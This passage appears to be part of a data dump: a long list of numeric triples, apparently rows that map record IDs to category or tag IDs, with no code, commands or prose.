(3159, 1, 0),
(3160, 1, 0),
(3161, 1, 0),
(3162, 1, 0),
(3163, 1, 0),
(3164, 1, 0),
(3165, 1, 0),
(3166, 1, 0),
(3167, 1, 0),
(3168, 1, 0),
(3169, 1, 0),
(3170, 1, 0),
(3171, 1, 0),
(3172, 1, 0),
(3173, 1, 0),
(3174, 1, 0),
(3175, 1, 0),
(3176, 1, 0),
(3177, 1, 0),
(3178, 1, 0),
(3179, 1, 0),
(3180, 1, 0),
(3181, 1, 0),
(3182, 1, 0),
(3182, 62, 0),
(3182, 63, 0),
(3182, 64, 0),
(3182, 65, 0),
(3182, 66, 0),
(3182, 67, 0),
(3183, 1, 0),
(3184, 1, 0),
(3185, 1, 0),
(3186, 1, 0),
(3186, 62, 0),
(3186, 63, 0),
(3186, 64, 0),
(3187, 1, 0),
(3188, 1, 0),
(3189, 1, 0),
(3190, 1, 0),
(3191, 1, 0),
(3192, 1, 0),
(3192, 68, 0),
(3192, 69, 0),
(3192, 70, 0),
(3192, 71, 0),
(3194, 1, 0),
(3195, 1, 0),
(3196, 1, 0),
(3197, 1, 0),
(3198, 1, 0),
(3199, 1, 0),
(3200, 1, 0),
(3201, 1, 0),
(3202, 1, 0),
(3203, 1, 0),
(3204, 1, 0),
(3204, 72, 0),
(3204, 73, 0),
(3204, 74, 0),
(3205, 1, 0),
(3206, 1, 0),
(3207, 1, 0),
(3208, 1, 0),
(3209, 1, 0),
(3210, 1, 0),
(3211, 1, 0),
(3212, 1, 0),
(3213, 1, 0),
(3214, 1, 0),
(3215, 1, 0),
(3216, 1, 0),
(3217, 1, 0),
(3218, 1, 0),
(3218, 75, 0),
(3218, 76, 0),
(3218, 77, 0),
(3218, 78, 0),
(3218, 79, 0),
(3219, 1, 0),
(3220, 1, 0),
(3221, 1, 0),
(3222, 1, 0),
(3223, 1, 0),
(3224, 1, 0),
(3224, 80, 0),
(3224, 81, 0),
(3224, 82, 0),
(3224, 50, 0),
(3224, 83, 0),
(3224, 84, 0),
(3224, 85, 0),
(3224, 86, 0),
(3224, 87, 0),
(3224, 88, 0),
(3224, 89, 0),
(3224, 90, 0),
(3224, 91, 0),
(3225, 1, 0),
(3225, 51, 0),
(3225, 92, 0),
(3225, 93, 0),
(3225, 94, 0),
(3225, 95, 0),
(3225, 96, 0),
(3225, 97, 0),
(3225, 98, 0),
(3226, 1, 0),
(3227, 1, 0),
(3228, 1, 0),
(3229, 1, 0),
(3230, 1, 0),
(3231, 1, 0),
(3232, 1, 0),
(3233, 1, 0),
(3234, 1, 0),
(3235, 1, 0),
(3236, 1, 0),
(3236, 99, 0),
(3236, 100, 0),
(3236, 101, 0),
(3236, 102, 0),
(3236, 45, 0),
(3236, 38, 0),
(3236, 103, 0),
(3237, 1, 0),
(3237, 80, 0),
(3237, 81, 0),
(3237, 104, 0),
(3237, 83, 0),
(3237, 84, 0),
(3238, 1, 0),
(3239, 1, 0),
(3240, 1, 0),
(3241, 1, 0),
(3242, 1, 0),
(3243, 1, 0),
(3244, 1, 0),
(3245, 1, 0),
(3246, 1, 0),
(3247, 1, 0),
(3248, 1, 0),
(3249, 1, 0),
(3249, 38, 0),
(3249, 105, 0),
(3249, 106, 0),
(3249, 84, 0),
(3250, 1, 0),
(3251, 1, 0),
(3252, 1, 0),
(3253, 1, 0),
(3254, 1, 0),
(3255, 1, 0),
(3256, 1, 0),
(3257, 1, 0),
(3258, 1, 0),
(3259, 1, 0),
(3260, 1, 0),
(3261, 1, 0),
(3262, 1, 0),
(3263, 1, 0),
(3264, 1, 0),
(3265, 1, 0),
(3266, 1, 0),
(3267, 1, 0),
(3268, 1, 0),
(3269, 1, 0),
(3270, 1, 0),
(3271, 1, 0),
(3272, 1, 0),
(3273, 1, 0),
(3274, 1, 0),
(3275, 1, 0),
(3276, 1, 0),
(3276, 107, 0),
(3276, 105, 0),
(3276, 108, 0),
(3276, 109, 0),
(3276, 38, 0),
(3277, 1, 0),
(3278, 1, 0),
(3279, 1, 0),
(3280, 1, 0),
(3281, 1, 0),
(3282, 1, 0),
(3283, 1, 0),
(3283, 80, 0),
(3283, 110, 0),
(3283, 50, 0),
(3283, 82, 0),
(3284, 1, 0),
(3285, 1, 0),
(3286, 1, 0),
(3287, 1, 0),
(3288, 1, 0),
(3289, 1, 0),
(3290, 1, 0),
(3291, 1, 0),
(3292, 1, 0),
(3293, 1, 0),
(3294, 1, 0),
(3295, 1, 0),
(3296, 1, 0),
(3297, 1, 0),
(3298, 1, 0),
(3299, 1, 0),
(3299, 50, 0),
(3299, 52, 0),
(3299, 38, 0),
(3299, 46, 0),
(3299, 51, 0),
(3300, 1, 0),
(3301, 1, 0),
(3302, 1, 0),
(3302, 50, 0),
(3302, 111, 0),
(3302, 38, 0),
(3302, 46, 0),
(3302, 49, 0),
(3303, 1, 0),
(3304, 1, 0),
(3305, 1, 0),
(3306, 1, 0),
(3306, 49, 0),
(3306, 52, 0),
(3306, 111, 0),
(3306, 112, 0),
(3306, 113, 0),
(3307, 1, 0),
(3308, 1, 0),
(3309, 1, 0),
(3310, 1, 0),
(3311, 1, 0),
(3312, 1, 0),
(3313, 1, 0),
(3314, 1, 0),
(3315, 1, 0),
(3316, 1, 0),
(3317, 1, 0),
(3317, 114, 0),
(3317, 115, 0),
(3317, 36, 0),
(3317, 116, 0),
(3318, 1, 0),
(3319, 1, 0),
(3319, 117, 0),
(3319, 118, 0),
(3319, 119, 0),
(3319, 120, 0),
(3319, 121, 0),
(3322, 1, 0),
(3323, 1, 0),
(3324, 1, 0),
(3324, 122, 0),
(3324, 123, 0),
(3324, 124, 0),
(3324, 125, 0),
(3324, 126, 0),
(3327, 1, 0),
(3327, 127, 0),
(3327, 128, 0),
(3327, 129, 0),
(3327, 130, 0),
(3327, 131, 0),
(3330, 1, 0),
(3331, 1, 0),
(3331, 132, 0),
(3331, 133, 0),
(3331, 134, 0),
(3331, 135, 0),
(3331, 136, 0),
(3334, 1, 0),
(3334, 137, 0),
(3334, 138, 0),
(3334, 139, 0),
(3334, 140, 0),
(3334, 141, 0),
(3337, 1, 0),
(3337, 142, 0),
(3337, 143, 0),
(3337, 144, 0),
(3337, 145, 0),
(3342, 1, 0),
(3343, 1, 0),
(3343, 146, 0),
(3343, 147, 0),
(3343, 148, 0),
(3343, 149, 0),
(3343, 150, 0),
(3346, 1, 0),
(3346, 151, 0),
(3346, 152, 0),
(3346, 153, 0),
(3346, 154, 0),
(3346, 155, 0),
(3349, 1, 0),
(3349, 156, 0),
(3349, 157, 0),
(3349, 158, 0),
(3349, 159, 0),
(3349, 160, 0),
(3352, 1, 0),
(3352, 161, 0),
(3352, 162, 0),
(3352, 163, 0),
(3352, 164, 0),
(3352, 165, 0),
(3355, 1, 0),
(3355, 166, 0),
(3355, 167, 0),
(3355, 168, 0),
(3355, 169, 0),
(3355, 170, 0),
(3358, 1, 0),
(3358, 171, 0),
(3358, 125, 0),
(3358, 172, 0),
(3358, 173, 0),
(3358, 174, 0),
(3361, 1, 0),
(3361, 175, 0),
(3361, 176, 0),
(3361, 177, 0),
(3361, 178, 0),
(3364, 1, 0),
(3364, 179, 0),
(3364, 180, 0),
(3364, 181, 0),
(3364, 182, 0),
(3364, 183, 0),
(3367, 1, 0),
(3368, 1, 0),
(3369, 1, 0),
(3370, 1, 0),
(3370, 50, 0),
(3370, 111, 0),
(3370, 38, 0),
(3370, 46, 0),
(3371, 1, 0),
(3372, 1, 0),
(3373, 1, 0),
(3374, 1, 0),
(3375, 1, 0),
(3376, 1, 0),
(3377, 1, 0),
(3378, 1, 0),
(3379, 1, 0),
(3380, 1, 0),
(3381, 1, 0),
(3382, 1, 0),
(3383, 1, 0),
(3384, 1, 0),
(3385, 1, 0),
(3386, 1, 0),
(3387, 1, 0),
(3388, 1, 0),
(3389, 1, 0),
(3390, 1, 0),
(3391, 1, 0),
(3392, 1, 0),
(3393, 1, 0),
(3393, 184, 0),
(3393, 51, 0),
(3393, 185, 0),
(3393, 186, 0),
(3393, 46, 0),
(3394, 1, 0),
(3395, 1, 0),
(3396, 1, 0),
(3397, 1, 0),
(3398, 1, 0),
(3399, 1, 0),
(3400, 1, 0),
(3400, 187, 0),
(3400, 188, 0),
(3400, 189, 0),
(3400, 190, 0),
(3400, 191, 0),
(3400, 192, 0),
(3400, 193, 0),
(3400, 194, 0),
(3400, 195, 0),
(3400, 196, 0),
(3400, 197, 0),
(3400, 198, 0),
(3400, 199, 0),
(3400, 200, 0),
(3400, 201, 0),
(3400, 202, 0),
(3400, 203, 0),
(3400, 204, 0),
(3400, 205, 0),
(3401, 1, 0),
(3402, 1, 0),
(3402, 196, 0),
(3402, 187, 0),
(3402, 193, 0),
(3402, 198, 0),
(3402, 191, 0),
(3402, 206, 0),
(3402, 203, 0),
(3402, 195, 0),
(3402, 197, 0),
(3402, 205, 0),
(3402, 190, 0),
(3402, 192, 0),
(3402, 189, 0),
(3402, 200, 0),
(3402, 199, 0),
(3402, 188, 0),
(3403, 1, 0),
(3403, 192, 0),
(3403, 196, 0),
(3403, 195, 0),
(3403, 205, 0),
(3403, 204, 0),
(3403, 198, 0),
(3403, 193, 0),
(3403, 200, 0),
(3403, 197, 0),
(3403, 194, 0),
(3403, 199, 0),
(3403, 206, 0),
(3403, 201, 0),
(3403, 202, 0),
(3403, 191, 0),
(3403, 187, 0),
(3403, 189, 0),
(3404, 1, 0),
(3404, 49, 0),
(3404, 207, 0),
(3404, 208, 0),
(3404, 209, 0),
(3404, 210, 0),
(3404, 185, 0),
(3404, 211, 0),
(3404, 46, 0),
(3404, 212, 0),
(3404, 213, 0),
(3404, 47, 0),
(3404, 214, 0),
(3404, 215, 0),
(3404, 216, 0),
(3404, 217, 0),
(3404, 218, 0),
(3404, 51, 0),
(3404, 219, 0),
(3405, 1, 0),
(3406, 1, 0),
(3406, 220, 0),
(3406, 221, 0),
(3406, 51, 0),
(3406, 47, 0),
(3406, 218, 0),
(3406, 49, 0),
(3406, 217, 0),
(3406, 222, 0),
(3406, 223, 0),
(3406, 224, 0),
(3406, 211, 0),
(3406, 209, 0),
(3406, 225, 0),
(3406, 185, 0),
(3406, 207, 0),
(3406, 226, 0),
(3406, 227, 0),
(3406, 46, 0),
(3406, 228, 0),
(3407, 1, 0),
(3408, 1, 0),
(3409, 1, 0),
(3410, 1, 0),
(3411, 1, 0),
(3412, 1, 0),
(3413, 1, 0),
(3414, 1, 0),
(3414, 110, 0),
(3414, 229, 0),
(3414, 50, 0),
(3414, 80, 0),
(3414, 230, 0),
(3415, 1, 0),
(3415, 110, 0),
(3415, 229, 0),
(3415, 80, 0),
(3415, 104, 0),
(3415, 50, 0),
(3416, 1, 0),
(3417, 1, 0),
(3418, 1, 0),
(3419, 1, 0),
(3420, 1, 0),
(3420, 231, 0),
(3420, 232, 0),
(3420, 233, 0),
(3420, 234, 0),
(3420, 235, 0),
(3420, 236, 0),
(3420, 237, 0),
(3420, 238, 0),
(3420, 239, 0),
(3420, 240, 0),
(3420, 241, 0),
(3420, 242, 0),
(3420, 243, 0),
(3420, 244, 0),
(3420, 245, 0),
(3420, 246, 0),
(3420, 247, 0),
(3420, 248, 0),
(3420, 249, 0),
(3420, 250, 0),
(3420, 251, 0),
(3420, 252, 0),
(3420, 253, 0),
(3420, 254, 0),
(3420, 255, 0),
(3420, 256, 0),
(3420, 257, 0),
(3420, 258, 0),
(3420, 259, 0),
(3420, 260, 0),
(3420, 261, 0),
(3420, 262, 0),
(3421, 1, 0),
(3422, 1, 0),
(3423, 1, 0),
(3423, 263, 0),
(3423, 264, 0),
(3423, 265, 0),
(3423, 266, 0),
(3423, 267, 0),
(3423, 268, 0),
(3423, 269, 0),
(3423, 270, 0),
(3423, 271, 0),
(3423, 272, 0),
(3423, 273, 0),
(3423, 274, 0),
(3423, 275, 0),
(3423, 276, 0),
(3423, 277, 0),
(3423, 278, 0),
(3423, 279, 0),
(3423, 280, 0),
(3423, 281, 0),
(3424, 1, 0),
(3425, 1, 0),
(3426, 1, 0),
(3427, 1, 0),
(3427, 282, 0),
(3427, 278, 0),
(3427, 266, 0),
(3427, 280, 0),
(3427, 283, 0),
(3427, 275, 0),
(3427, 284, 0),
(3427, 268, 0),
(3427, 274, 0),
(3427, 285, 0),
(3427, 281, 0),
(3427, 270, 0),
(3427, 286, 0),
(3427, 287, 0),
(3427, 288, 0),
(3427, 276, 0),
(3427, 289, 0),
(3427, 272, 0),
(3427, 273, 0),
(3428, 1, 0),
(3429, 1, 0),
(3430, 1, 0),
(3431, 1, 0),
(3431, 290, 0),
(3431, 291, 0),
(3431, 292, 0),
(3431, 293, 0),
(3431, 294, 0),
(3431, 295, 0),
(3431, 296, 0),
(3431, 297, 0),
(3431, 298, 0),
(3431, 299, 0),
(3431, 300, 0),
(3431, 301, 0),
(3431, 302, 0),
(3431, 303, 0),
(3431, 304, 0),
(3431, 305, 0),
(3431, 306, 0),
(3431, 307, 0),
(3432, 1, 0),
(3433, 1, 0),
(3434, 1, 0),
(3435, 1, 0),
(3435, 292, 0),
(3435, 308, 0),
(3435, 297, 0),
(3435, 309, 0),
(3435, 304, 0),
(3435, 310, 0),
(3435, 307, 0),
(3435, 301, 0),
(3435, 311, 0),
(3435, 312, 0),
(3435, 313, 0),
(3435, 314, 0),
(3435, 300, 0),
(3435, 298, 0),
(3435, 315, 0),
(3435, 316, 0),
(3435, 294, 0),
(3435, 317, 0),
(3435, 70, 0),
(3436, 1, 0),
(3437, 1, 0),
(3438, 1, 0),
(3439, 1, 0),
(3439, 318, 0),
(3439, 319, 0),
(3439, 185, 0),
(3439, 320, 0),
(3439, 321, 0),
(3439, 52, 0),
(3439, 47, 0),
(3439, 207, 0),
(3439, 211, 0),
(3439, 322, 0),
(3439, 323, 0),
(3439, 215, 0),
(3439, 46, 0),
(3439, 213, 0),
(3439, 49, 0),
(3439, 45, 0),
(3439, 218, 0),
(3439, 212, 0),
(3439, 216, 0),
(3440, 1, 0),
(3441, 1, 0),
(3442, 1, 0),
(3443, 1, 0),
(3444, 1, 0),
(3445, 1, 0),
(3446, 1, 0),
(3446, 324, 0),
(3446, 325, 0),
(3446, 326, 0),
(3446, 327, 0),
(3446, 328, 0),
(3446, 329, 0),
(3446, 330, 0),
(3446, 331, 0),
(3446, 332, 0),
(3446, 333, 0),
(3446, 334, 0),
(3446, 335, 0),
(3446, 336, 0),
(3446, 337, 0),
(3446, 338, 0),
(3446, 339, 0),
(3446, 340, 0),
(3446, 341, 0),
(3447, 1, 0),
(3448, 1, 0),
(3449, 1, 0),
(3450, 1, 0),
(3451, 1, 0),
(3452, 1, 0),
(3453, 1, 0),
(3454, 1, 0),
(3455, 1, 0),
(3456, 1, 0),
(3457, 1, 0),
(3458, 1, 0),
(3459, 1, 0),
(3460, 1, 0),
(3461, 1, 0),
(3462, 1, 0),
(3462, 342, 0),
(3462, 343, 0),
(3462, 344, 0),
(3462, 345, 0),
(3462, 346, 0),
(3462, 347, 0),
(3462, 348, 0),
(3462, 349, 0),
(3462, 350, 0),
(3462, 351, 0),
(3462, 352, 0),
(3462, 353, 0),
(3462, 354, 0),
(3462, 355, 0),
(3462, 356, 0),
(3462, 357, 0),
(3462, 358, 0),
(3462, 359, 0),
(3463, 1, 0),
(3464, 1, 0),
(3465, 1, 0),
(3466, 1, 0),
(3467, 1, 0),
(3468, 1, 0),
(3468, 354, 0),
(3468, 360, 0),
(3468, 361, 0),
(3468, 343, 0),
(3468, 362, 0),
(3468, 347, 0),
(3468, 358, 0),
(3468, 363, 0),
(3468, 356, 0),
(3468, 364, 0),
(3468, 346, 0),
(3468, 365, 0),
(3468, 366, 0),
(3468, 367, 0),
(3468, 344, 0),
(3468, 352, 0),
(3468, 351, 0),
(3468, 353, 0),
(3469, 1, 0),
(3470, 1, 0),
(3471, 1, 0),
(3472, 1, 0),
(3473, 1, 0),
(3474, 1, 0),
(3475, 1, 0),
(3476, 1, 0),
(3477, 1, 0),
(3478, 1, 0),
(3479, 1, 0),
(3480, 1, 0),
(3480, 184, 0),
(3480, 320, 0),
(3480, 368, 0),
(3480, 222, 0),
(3480, 210, 0),
(3480, 215, 0),
(3480, 219, 0),
(3480, 209, 0),
(3480, 369, 0),
(3480, 318, 0),
(3480, 225, 0),
(3480, 47, 0),
(3480, 217, 0),
(3480, 321, 0),
(3480, 214, 0),
(3480, 370, 0),
(3480, 213, 0),
(3481, 1, 0),
(3482, 1, 0),
(3483, 1, 0),
(3484, 1, 0),
(3484, 371, 0),
(3484, 372, 0),
(3484, 373, 0),
(3484, 374, 0),
(3484, 375, 0),
(3484, 376, 0),
(3484, 377, 0),
(3484, 378, 0),
(3484, 379, 0),
(3484, 380, 0),
(3484, 381, 0),
(3484, 382, 0),
(3484, 383, 0),
(3484, 384, 0),
(3484, 385, 0),
(3484, 386, 0),
(3484, 387, 0),
(3484, 388, 0),
(3485, 1, 0),
(3486, 1, 0),
(3487, 1, 0),
(3488, 1, 0),
(3489, 1, 0),
(3490, 1, 0),
(3490, 383, 0),
(3490, 372, 0),
(3490, 389, 0),
(3490, 390, 0),
(3490, 391, 0),
(3490, 374, 0),
(3490, 392, 0),
(3490, 393, 0),
(3490, 394, 0),
(3490, 395, 0),
(3490, 396, 0),
(3490, 385, 0),
(3490, 397, 0),
(3490, 388, 0),
(3490, 398, 0),
(3490, 399, 0),
(3490, 375, 0),
(3490, 384, 0),
(3491, 1, 0),
(3492, 1, 0),
(3493, 1, 0),
(3494, 1, 0),
(3495, 1, 0),
(3496, 1, 0),
(3497, 1, 0),
(3498, 1, 0),
(3500, 1, 0),
(3501, 1, 0),
(3502, 1, 0),
(3503, 1, 0),
(3504, 1, 0),
(3505, 1, 0),
(3506, 1, 0),
(3506, 400, 0),
(3506, 401, 0),
(3506, 402, 0),
(3506, 403, 0),
(3506, 404, 0),
(3506, 405, 0),
(3506, 406, 0),
(3506, 407, 0),
(3506, 408, 0),
(3506, 409, 0),
(3506, 410, 0),
(3506, 411, 0),
(3506, 412, 0),
(3506, 413, 0),
(3506, 414, 0),
(3506, 415, 0),
(3507, 1, 0),
(3510, 1, 0),
(3510, 416, 0),
(3510, 417, 0),
(3510, 418, 0),
(3510, 419, 0),
(3510, 414, 0),
(3510, 420, 0),
(3510, 413, 0),
(3510, 406, 0),
(3510, 421, 0),
(3510, 400, 0),
(3510, 411, 0),
(3510, 409, 0),
(3510, 422, 0),
(3510, 423, 0),
(3510, 424, 0),
(3510, 415, 0),
(3511, 1, 0),
(3512, 1, 0),
(3513, 1, 0),
(3514, 1, 0),
(3515, 1, 0),
(3516, 1, 0),
(3516, 38, 0),
(3516, 50, 0),
(3516, 213, 0),
(3516, 46, 0),
(3517, 1, 0),
(3518, 1, 0),
(3519, 1, 0),
(3520, 1, 0),
(3521, 1, 0),
(3522, 1, 0),
(3522, 425, 0),
(3522, 426, 0),
(3522, 405, 0),
(3522, 419, 0),
(3522, 427, 0),
(3522, 428, 0),
(3522, 423, 0),
(3522, 429, 0),
(3522, 400, 0),
(3522, 404, 0),
(3522, 430, 0),
(3522, 431, 0),
(3522, 432, 0),
(3522, 410, 0),
(3522, 418, 0),
(3522, 407, 0),
(3523, 1, 0),
(3526, 1, 0),
(3527, 1, 0),
(3528, 1, 0),
(3529, 1, 0),
(3530, 1, 0),
(3533, 1, 0),
(3534, 1, 0),
(3535, 1, 0),
(3535, 433, 0),
(3535, 434, 0),
(3535, 435, 0),
(3535, 436, 0),
(3535, 437, 0),
(3535, 438, 0),
(3535, 439, 0),
(3535, 440, 0),
(3535, 441, 0),
(3535, 442, 0),
(3535, 443, 0),
(3535, 444, 0),
(3535, 445, 0),
(3535, 446, 0),
(3535, 447, 0),
(3535, 448, 0),
(3536, 1, 0),
(3537, 1, 0),
(3540, 1, 0),
(3541, 1, 0),
(3542, 1, 0),
(3543, 1, 0),
(3544, 1, 0),
(3545, 1, 0),
(3545, 449, 0),
(3545, 99, 0),
(3545, 38, 0),
(3545, 450, 0),
(3545, 100, 0),
(3546, 1, 0),
(3546, 52, 0),
(3546, 451, 0),
(3546, 452, 0),
(3546, 50, 0),
(3548, 1, 0),
(3549, 1, 0),
(3550, 1, 0),
(3551, 1, 0),
(3552, 1, 0),
(3553, 1, 0),
(3554, 1, 0),
(3554, 453, 0),
(3554, 454, 0),
(3554, 455, 0),
(3554, 456, 0),
(3554, 457, 0),
(3554, 458, 0),
(3554, 459, 0),
(3554, 460, 0),
(3554, 461, 0),
(3554, 462, 0),
(3554, 463, 0),
(3554, 464, 0),
(3554, 465, 0),
(3554, 466, 0),
(3554, 467, 0),
(3554, 468, 0),
(3554, 469, 0),
(3555, 1, 0),
(3556, 1, 0),
(3556, 470, 0),
(3556, 455, 0),
(3556, 471, 0),
(3556, 472, 0),
(3556, 473, 0),
(3556, 462, 0),
(3556, 474, 0),
(3556, 475, 0),
(3556, 461, 0),
(3556, 464, 0),
(3556, 476, 0),
(3556, 477, 0),
(3556, 478, 0),
(3556, 479, 0),
(3556, 465, 0),
(3556, 480, 0),
(3556, 469, 0),
(3557, 1, 0),
(3558, 1, 0),
(3558, 481, 0),
(3558, 482, 0),
(3558, 483, 0),
(3558, 484, 0),
(3558, 485, 0),
(3558, 486, 0),
(3558, 487, 0),
(3558, 488, 0),
(3558, 489, 0),
(3558, 490, 0),
(3558, 491, 0),
(3558, 492, 0),
(3558, 493, 0),
(3558, 494, 0),
(3558, 495, 0),
(3558, 496, 0),
(3559, 1, 0),
(3560, 1, 0),
(3561, 1, 0),
(3562, 1, 0),
(3563, 1, 0),
(3564, 1, 0),
(3564, 497, 0),
(3564, 498, 0),
(3564, 499, 0),
(3564, 500, 0),
(3564, 501, 0),
(3564, 502, 0),
(3564, 503, 0),
(3564, 504, 0),
(3564, 505, 0),
(3564, 506, 0),
(3564, 507, 0),
(3564, 508, 0),
(3564, 509, 0),
(3564, 510, 0),
(3564, 511, 0),
(3564, 512, 0),
(3564, 513, 0),
(3565, 1, 0),
(3566, 1, 0),
(3567, 1, 0),
(3568, 1, 0),
(3572, 1, 0),
(3573, 1, 0),
(3574, 1, 0),
(3575, 1, 0),
(3576, 1, 0),
(3576, 213, 0),
(3576, 38, 0),
(3576, 514, 0),
(3576, 515, 0),
(3577, 1, 0),
(3578, 1, 0),
(3581, 1, 0),
(3582, 1, 0),
(3584, 1, 0),
(3585, 1, 0),
(3586, 1, 0),
(3586, 516, 0),
(3586, 50, 0),
(3586, 517, 0),
(3586, 49, 0),
(3586, 38, 0),
(3586, 46, 0),
(3587, 1, 0),
(3587, 518, 0),
(3587, 519, 0),
(3587, 520, 0),
(3587, 521, 0),
(3588, 1, 0),
(3589, 1, 0),
(3590, 1, 0),
(3591, 1, 0),
(3592, 1, 0),
(3592, 522, 0),
(3592, 523, 0),
(3592, 524, 0),
(3592, 525, 0),
(3592, 526, 0),
(3592, 527, 0),
(3592, 528, 0),
(3592, 529, 0),
(3592, 530, 0),
(3592, 531, 0),
(3592, 532, 0),
(3592, 533, 0),
(3592, 534, 0),
(3592, 535, 0),
(3592, 536, 0),
(3592, 537, 0),
(3592, 538, 0),
(3593, 1, 0),
(3593, 539, 0),
(3593, 540, 0),
(3593, 107, 0),
(3593, 541, 0),
(3593, 542, 0),
(3593, 543, 0),
(3594, 1, 0),
(3595, 1, 0),
(3596, 1, 0),
(3596, 544, 0),
(3596, 545, 0),
(3596, 546, 0),
(3596, 547, 0),
(3596, 548, 0),
(3596, 549, 0),
(3596, 550, 0),
(3596, 551, 0),
(3596, 552, 0),
(3596, 553, 0),
(3596, 554, 0),
(3596, 555, 0),
(3596, 556, 0),
(3596, 557, 0),
(3596, 558, 0),
(3596, 559, 0),
(3596, 560, 0),
(3596, 561, 0),
(3596, 562, 0),
(3597, 1, 0),
(3598, 1, 0),
(3599, 1, 0),
(3599, 563, 0),
(3599, 564, 0),
(3599, 565, 0),
(3599, 566, 0),
(3599, 567, 0),
(3599, 568, 0),
(3599, 569, 0),
(3599, 570, 0),
(3599, 571, 0),
(3599, 572, 0),
(3599, 573, 0),
(3599, 574, 0),
(3599, 575, 0),
(3599, 576, 0),
(3599, 577, 0),
(3599, 578, 0),
(3599, 579, 0),
(3599, 580, 0),
(3600, 1, 0),
(3601, 1, 0),
(3602, 1, 0),
(3602, 581, 0),
(3602, 539, 0),
(3602, 582, 0),
(3602, 583, 0),
(3602, 584, 0),
(3603, 1, 0),
(3604, 1, 0),
(3605, 1, 0),
(3605, 540, 0),
(3605, 107, 0),
(3605, 539, 0),
(3605, 38, 0),
(3606, 1, 0),
(3607, 1, 0),
(3607, 49, 0),
(3607, 38, 0),
(3607, 585, 0),
(3607, 586, 0),
(3607, 587, 0),
(3608, 1, 0),
(3609, 1, 0),
(3610, 1, 0),
(3610, 588, 0),
(3610, 589, 0),
(3610, 590, 0),
(3610, 591, 0),
(3610, 592, 0),
(3610, 593, 0),
(3610, 594, 0),
(3610, 595, 0),
(3610, 596, 0),
(3610, 597, 0),
(3610, 598, 0),
(3610, 599, 0),
(3610, 600, 0),
(3610, 601, 0),
(3610, 602, 0),
(3610, 603, 0),
(3610, 604, 0),
(3611, 1, 0),
(3612, 1, 0),
(3613, 1, 0),
(3613, 605, 0),
(3613, 606, 0),
(3613, 607, 0),
(3613, 608, 0),
(3613, 609, 0),
(3613, 610, 0),
(3613, 611, 0),
(3613, 612, 0),
(3613, 613, 0),
(3613, 614, 0),
(3613, 615, 0),
(3613, 616, 0),
(3613, 617, 0),
(3613, 618, 0),
(3613, 619, 0),
(3613, 620, 0),
(3613, 621, 0),
(3614, 1, 0),
(3615, 1, 0),
(3616, 1, 0),
(3617, 1, 0),
(3618, 1, 0),
(3619, 1, 0),
(3620, 1, 0),
(3621, 1, 0),
(3622, 1, 0),
(3623, 1, 0),
(3624, 1, 0),
(3625, 1, 0),
(3626, 1, 0),
(3627, 1, 0),
(3628, 1, 0),
(3629, 1, 0),
(3630, 1, 0),
(3630, 38, 0),
(3630, 116, 0),
(3630, 105, 0),
(3630, 106, 0),
(3631, 1, 0),
(3632, 1, 0),
(3633, 1, 0),
(3634, 1, 0),
(3635, 1, 0),
(3636, 1, 0),
(3637, 1, 0),
(3637, 92, 0),
(3637, 96, 0),
(3637, 95, 0),
(3637, 622, 0),
(3637, 623, 0),
(3639, 1, 0),
(3639, 102, 0),
(3639, 100, 0),
(3639, 582, 0),
(3639, 624, 0),
(3640, 1, 0),
(3641, 1, 0),
(3642, 1, 0),
(3643, 1, 0),
(3643, 625, 0),
(3643, 626, 0),
(3643, 627, 0),
(3643, 628, 0),
(3643, 629, 0),
(3643, 630, 0),
(3643, 631, 0),
(3643, 632, 0),
(3643, 633, 0),
(3643, 634, 0),
(3643, 635, 0),
(3643, 636, 0),
(3643, 637, 0),
(3643, 638, 0),
(3643, 639, 0),
(3643, 640, 0),
(3643, 641, 0),
(3643, 642, 0),
(3644, 1, 0),
(3644, 38, 0),
(3644, 643, 0),
(3644, 105, 0),
(3644, 644, 0),
(3644, 645, 0),
(3645, 1, 0),
(3646, 1, 0),
(3647, 1, 0),
(3648, 1, 0),
(3649, 1, 0),
(3650, 1, 0),
(3651, 1, 0),
(3652, 1, 0),
(3653, 1, 0),
(3654, 1, 0),
(3655, 1, 0),
(3656, 1, 0),
(3657, 1, 0),
(3658, 1, 0),
(3659, 1, 0),
(3660, 1, 0),
(3661, 1, 0),
(3662, 1, 0),
(3663, 1, 0),
(3664, 1, 0),
(3665, 1, 0),
(3666, 1, 0),
(3667, 1, 0),
(3668, 1, 0),
(3669, 1, 0),
(3670, 1, 0),
(3671, 1, 0),
(3672, 1, 0),
(3673, 1, 0),
(3674, 1, 0),
(3675, 1, 0),
(3676, 1, 0),
(3677, 1, 0),
(3678, 1, 0),
(3679, 1, 0),
(3680, 1, 0),
(3681, 1, 0),
(3682, 1, 0),
(3683, 1, 0),
(3684, 1, 0),
(3685, 1, 0),
(3686, 1, 0),
(3687, 1, 0),
(3688, 1, 0),
(3689, 1, 0),
(3690, 1, 0),
(3691, 1, 0),
(3692, 1, 0),
(3693, 1, 0),
(3694, 1, 0),
(3695, 1, 0),
(3696, 1, 0),
(3697, 1, 0),
(3698, 1, 0),
(3699, 1, 0),
(3700, 1, 0),
(3701, 1, 0),
(3702, 1, 0),
(3703, 1, 0),
(3704, 1, 0),
(3705, 1, 0),
(3706, 1, 0),
(3707, 1, 0),
(3708, 1, 0),
(3709, 1, 0),
(3710, 1, 0),
(3711, 1, 0),
(3712, 1, 0),
(3713, 1, 0),
(3714, 1, 0),
(3715, 1, 0),
(3716, 1, 0),
(3717, 1, 0),
(3718, 1, 0),
(3719, 1, 0),
(3720, 1, 0),
(3721, 1, 0),
(3722, 1, 0),
(3723, 1, 0),
(3724, 1, 0),
(3725, 1, 0),
(3726, 1, 0),
(3727, 1, 0),
(3728, 1, 0),
(3729, 1, 0),
(3730, 1, 0),
(3731, 1, 0),
(3732, 1, 0),
(3733, 1, 0),
(3734, 1, 0),
(3735, 1, 0),
(3736, 1, 0),
(3736, 540, 0),
(3736, 107, 0),
(3736, 50, 0),
(3736, 646, 0),
(3736, 105, 0),
(3736, 38, 0),
(3738, 1, 0),
(3739, 1, 0),
(3740, 1, 0),
(3741, 1, 0),
(3742, 1, 0),
(3743, 1, 0),
(3744, 1, 0),
(3745, 1, 0),
(3746, 1, 0),
(3747, 1, 0),
(3748, 1, 0),
(3748, 647, 0),
(3748, 648, 0),
(3748, 649, 0),
(3748, 50, 0),
(3749, 1, 0),
(3750, 1, 0),
(3751, 1, 0),
(3752, 1, 0),
(3753, 1, 0),
(3753, 38, 0),
(3753, 49, 0),
(3753, 650, 0),
(3753, 95, 0),
(3753, 93, 0),
(3753, 651, 0),
(3754, 1, 0),
(3755, 1, 0),
(3756, 1, 0),
(3757, 1, 0),
